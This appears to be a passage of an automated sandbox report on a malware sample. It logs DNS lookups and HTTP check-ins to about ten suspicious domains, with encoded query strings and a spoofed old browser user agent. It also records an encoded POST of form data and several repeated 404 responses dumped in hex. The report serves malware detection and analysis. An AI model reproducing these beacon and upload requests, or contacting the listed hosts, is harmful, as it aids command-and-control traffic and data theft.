            Source: global trafficHTTP traffic detected: GET /5lco/?H0kxIVc=CvWen2QyFQx61qXZcJ6WaNLV8x6X7ZVzg6r8Qqi7af+RkACh3mo/Ys7mcuj5lMFPExxzGnawwjipItEZ43N8KIbGnzAFfsAX8PL843K3MC6R2n7AiDX71Bw=&Ot=J0UP4Hshc HTTP/1.1Host: www.bandukchi.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /qmow/?H0kxIVc=na0KCebXsUeEcQbjI8C3RJS2SBGfuD1cmXaEpqyofp4hZXm4YCiWGFly0HVDOhs56sJdVgPDJehM8FklOw5CghWrF+7Yka4QOwdp8ykVOcUPZunN9V/VPgg=&Ot=J0UP4Hshc HTTP/1.1Host: www.onlineblikje.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /4oy8/?H0kxIVc=eJmBD13k64JHFxSWOYO7bSQNXUvra9CcpSnvMZyv8GXgjYS7iGOJ4r3qlOLMHwm47b7Urtwu+Ud8lkmMYJJLw7a1N+npSrnw+8NLQJnsUuGONqGxi2BbLT4=&Ot=J0UP4Hshc HTTP/1.1Host: www.ninesquare.gamesAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /bawd/?Ot=J0UP4Hshc&H0kxIVc=u5Voz89uvsTT2ra5JGRdo2CoktUkYzD5T2fkk0TxGbdhObJgjC1dgKFtYssbe+sKkN5ypiW+hntvof+b3woUZtrmCzyplN8wJfaiWaIfZPgKl3YVjiCvOuw= HTTP/1.1Host: www.s9gzg9.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /l9k5/?H0kxIVc=H7cQmPt9JKqTBSlTYALj3uL313cqwSgrpOv4Qk+KWtYmd0Jzyglo5RxLzde7ABUUHrDY6BWuihw46hFGdejdjXkFASgi7f2oXUpHkyzL6FMNfiZrHYO4gE8=&Ot=J0UP4Hshc HTTP/1.1Host: www.030002832.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /y4rz/?H0kxIVc=xriQ2m9IoSX/ZoqlWfOVIBJe8W/8vJ5niPS32xN8MNumdhR7vqoy4sIK639fnDEnN3UXIMGdxg/r6m8kDokIxA6VYynAvS6SL+DIBN0UUOY3N4LB1E/wQc0=&Ot=J0UP4Hshc HTTP/1.1Host: www.meliorahomes.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /mszq/?H0kxIVc=qzVn//GB+4OjafG5GgjKg0F9R431hw5vq1LA9tKLMIDmfofusT37PFzci/hE67mKwrwsGFZ3ShgwJaTX+jeHs9Yuswh/Qy8vjFWcpY9xjOhcfqEzjvtiqBI=&Ot=J0UP4Hshc HTTP/1.1Host: www.bdipjg.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficHTTP traffic detected: GET /sm4f/?Ot=J0UP4Hshc&H0kxIVc=EaEMrXPp8wHqWJVBhtHqF3+v/VQY0/i9nv6TiqWBPFHSbs8QlWt2xVXVrkxIfcrF7TYepETuHZ89BYJlBcojqP6ggOEAyvBHZWGMGsHph5U7SQ47QEw+uXM= HTTP/1.1Host: www.sortcy.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
            Source: global trafficDNS traffic detected: DNS query: www.it2sp8.vip
            Source: global trafficDNS traffic detected: DNS query: www.bandukchi.com
            Source: global trafficDNS traffic detected: DNS query: www.onlineblikje.online
            Source: global trafficDNS traffic detected: DNS query: www.ninesquare.games
            Source: global trafficDNS traffic detected: DNS query: www.s9gzg9.vip
            Source: global trafficDNS traffic detected: DNS query: www.030002832.xyz
            Source: global trafficDNS traffic detected: DNS query: www.meliorahomes.net
            Source: global trafficDNS traffic detected: DNS query: www.bdipjg.asia
            Source: global trafficDNS traffic detected: DNS query: www.sortcy.top
            Source: global trafficDNS traffic detected: DNS query: www.bearableguy.net
            Source: unknownHTTP traffic detected: POST /5lco/ HTTP/1.1Host: www.bandukchi.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-USOrigin: http://www.bandukchi.comReferer: http://www.bandukchi.com/5lco/Cache-Control: max-age=0Content-Length: 204Content-Type: application/x-www-form-urlencodedConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3Data Raw: 48 30 6b 78 49 56 63 3d 50 74 2b 2b 6b 41 68 42 43 54 70 51 79 76 65 46 63 4b 69 79 57 38 66 36 31 30 62 30 6f 71 64 4d 6b 5a 6e 55 59 75 6e 2b 63 75 57 6b 79 79 58 5a 37 52 39 76 62 63 44 39 66 75 72 4e 2b 70 39 78 41 44 74 68 43 79 47 33 34 46 32 42 4c 6f 41 7a 69 69 4a 34 51 70 33 35 6e 42 67 56 54 35 4d 47 2b 38 53 36 38 47 4b 44 4c 79 57 30 33 6c 6a 34 33 77 72 4d 2b 52 31 65 76 6b 38 51 47 36 44 4c 33 64 36 41 61 37 76 36 2b 6a 4a 51 35 49 53 6f 7a 64 76 38 7a 59 57 77 46 74 61 2f 4c 69 4b 44 6b 61 6f 74 4c 30 4f 43 38 55 76 42 72 74 52 51 48 76 4e 6e 36 4d 61 48 66 58 65 74 65 66 57 32 35 51 3d 3d Data Ascii: H0kxIVc=Pt++kAhBCTpQyveFcKiyW8f610b0oqdMkZnUYun+cuWkyyXZ7R9vbcD9furN+p9xADthCyG34F2BLoAziiJ4Qp35nBgVT5MG+8S68GKDLyW03lj43wrM+R1evk8QG6DL3d6Aa7v6+jJQ5ISozdv8zYWwFta/LiKDkaotL0OC8UvBrtRQHvNn6MaHfXetefW25Q==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:43:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:43:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:43:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:43:58 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:04 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 34 72 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:44:07 GMTServer: Apache/2.4.6 (CentOS) PHP/7.2.34Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 79 34 72 7a 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /y4rz/ was not found on this server.</p></body></html>
